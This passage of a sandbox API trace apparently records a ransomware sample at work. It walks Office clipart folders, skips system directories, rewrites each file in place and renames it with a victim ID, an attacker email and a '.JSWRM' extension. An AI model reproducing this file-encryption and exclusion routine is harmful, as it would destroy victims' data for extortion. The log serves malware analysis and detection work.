(HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0099.548] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0099.548] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0099.548] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0099.548] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0099.548] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01734_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01734_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0099.549] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2201) returned 1 [0099.549] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.549] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x890) returned 0x20c6c0 [0099.549] ReadFile (in: hFile=0x314, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x890, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x890, lpOverlapped=0x0) returned 1 [0099.550] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.550] WriteFile (in: hFile=0x314, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x890, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x890, lpOverlapped=0x0) returned 1 [0099.550] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0099.550] CloseHandle (hObject=0x314) returned 1 [0099.550] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0099.550] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0099.551] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0099.551] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0099.551] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0099.551] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0099.551] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0099.551] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0099.551] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0099.551] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0099.551] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0099.551] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2473c0 [0099.551] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0099.551] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0099.551] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01734_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01734_.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01734_.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01734_.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0099.552] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2473c0 | out: hHeap=0x1e0000) returned 1 [0099.552] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0099.552] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0099.552] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10491364, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10491364, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x104b75c6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2c3, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="WB01740_.GIF", cAlternateFileName="")) returned 1 [0099.552] lstrcmpiW (lpString1="WB01740_.GIF", lpString2=".") returned 1 [0099.552] lstrcmpiW (lpString1="WB01740_.GIF", lpString2="..") returned 1 [0099.552] lstrcmpiW (lpString1="WB01740_.GIF", lpString2="...") returned 1 [0099.552] lstrcmpiW (lpString1="WB01740_.GIF", lpString2="windows") returned -1 [0099.552] lstrcmpiW (lpString1="WB01740_.GIF", lpString2="recovery") returned 1 [0099.552] lstrcmpiW (lpString1="WB01740_.GIF", lpString2="perflogs") returned 1 [0099.552] lstrcmpiW (lpString1="WB01740_.GIF", lpString2="documents and settings") returned 1 [0099.552] lstrcmpiW (lpString1="WB01740_.GIF", lpString2="$RECYCLE.BIN") returned 1 [0099.552] lstrcmpiW (lpString1="WB01740_.GIF", lpString2="system volume information") returned 1 [0099.552] lstrcmpiW (lpString1="WB01740_.GIF", lpString2="msocache") returned 1 [0099.552] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0099.552] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01740_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.552] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01740_.GIF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB01740_.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.552] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0099.552] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0099.552] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01740_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.552] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01740_.GIF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB01740_.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.552] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0099.552] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0099.552] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0099.552] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0099.552] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0099.552] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0099.553] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01740_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01740_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0099.553] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=707) returned 1 [0099.553] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.553] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c0) returned 0x20b1f8 [0099.553] ReadFile (in: hFile=0x314, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x2c0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e89c*=0x2c0, lpOverlapped=0x0) returned 1 [0099.554] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.554] WriteFile (in: hFile=0x314, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x2c0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e898*=0x2c0, lpOverlapped=0x0) returned 1 [0099.554] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20b1f8 | out: hHeap=0x1e0000) returned 1 [0099.554] CloseHandle (hObject=0x314) returned 1 [0099.554] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0099.554] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0099.554] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0099.554] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0099.554] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0099.554] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0099.554] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0099.554] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0099.554] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0099.554] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0099.554] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0099.555] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247f60 [0099.555] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0099.555] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0099.555] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01740_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01740_.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01740_.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01740_.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0099.556] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247f60 | out: hHeap=0x1e0000) returned 1 [0099.556] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0099.556] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0099.556] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10491364, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10491364, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10491364, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x253, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="WB01742_.GIF", cAlternateFileName="")) returned 1 [0099.556] lstrcmpiW (lpString1="WB01742_.GIF", lpString2=".") returned 1 [0099.556] lstrcmpiW (lpString1="WB01742_.GIF", lpString2="..") returned 1 [0099.556] lstrcmpiW (lpString1="WB01742_.GIF", lpString2="...") returned 1 [0099.556] lstrcmpiW (lpString1="WB01742_.GIF", lpString2="windows") returned -1 [0099.557] lstrcmpiW (lpString1="WB01742_.GIF", lpString2="recovery") returned 1 [0099.557] lstrcmpiW (lpString1="WB01742_.GIF", lpString2="perflogs") returned 1 [0099.557] lstrcmpiW (lpString1="WB01742_.GIF", lpString2="documents and settings") returned 1 [0099.557] lstrcmpiW (lpString1="WB01742_.GIF", lpString2="$RECYCLE.BIN") returned 1 [0099.557] lstrcmpiW (lpString1="WB01742_.GIF", lpString2="system volume information") returned 1 [0099.557] lstrcmpiW (lpString1="WB01742_.GIF", lpString2="msocache") returned 1 [0099.557] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0099.557] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01742_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.557] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01742_.GIF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB01742_.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.557] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0099.557] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0099.557] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01742_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.557] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01742_.GIF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB01742_.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.557] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0099.557] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0099.557] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0099.557] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0099.557] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0099.557] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0099.557] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01742_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01742_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0099.557] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=595) returned 1 [0099.558] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.558] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x250) returned 0x20b1f8 [0099.558] ReadFile (in: hFile=0x314, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x250, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e89c*=0x250, lpOverlapped=0x0) returned 1 [0099.558] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.559] WriteFile (in: hFile=0x314, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x250, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e898*=0x250, lpOverlapped=0x0) returned 1 [0099.559] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20b1f8 | out: hHeap=0x1e0000) returned 1 [0099.559] CloseHandle (hObject=0x314) returned 1 [0099.559] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0099.559] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0099.559] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0099.559] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0099.559] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0099.559] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0099.559] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0099.559] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0099.559] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0099.559] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0099.559] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0099.559] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0099.559] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0099.559] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0099.559] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01742_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01742_.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01742_.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01742_.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0099.561] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0099.561] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0099.561] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0099.561] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10491364, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10491364, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10491364, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4d5, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="WB01743_.GIF", cAlternateFileName="")) returned 1 [0099.561] lstrcmpiW (lpString1="WB01743_.GIF", lpString2=".") returned 1 [0099.561] lstrcmpiW (lpString1="WB01743_.GIF", lpString2="..") returned 1 [0099.561] lstrcmpiW (lpString1="WB01743_.GIF", lpString2="...") returned 1 [0099.561] lstrcmpiW (lpString1="WB01743_.GIF", lpString2="windows") returned -1 [0099.561] lstrcmpiW (lpString1="WB01743_.GIF", lpString2="recovery") returned 1 [0099.561] lstrcmpiW (lpString1="WB01743_.GIF", lpString2="perflogs") returned 1 [0099.561] lstrcmpiW (lpString1="WB01743_.GIF", lpString2="documents and settings") returned 1 [0099.561] lstrcmpiW (lpString1="WB01743_.GIF", lpString2="$RECYCLE.BIN") returned 1 [0099.561] lstrcmpiW (lpString1="WB01743_.GIF", lpString2="system volume information") returned 1 [0099.561] lstrcmpiW (lpString1="WB01743_.GIF", lpString2="msocache") returned 1 [0099.561] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0099.561] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01743_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.561] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01743_.GIF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB01743_.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.562] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0099.562] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0099.562] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01743_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.562] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01743_.GIF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB01743_.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.562] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0099.562] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0099.562] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0099.562] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0099.562] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0099.562] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0099.562] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01743_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01743_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0099.562] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1237) returned 1 [0099.562] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.562] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4d0) returned 0x230a00 [0099.562] ReadFile (in: hFile=0x314, lpBuffer=0x230a00, nNumberOfBytesToRead=0x4d0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesRead=0x345e89c*=0x4d0, lpOverlapped=0x0) returned 1 [0099.564] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.564] WriteFile (in: hFile=0x314, lpBuffer=0x230a00*, nNumberOfBytesToWrite=0x4d0, 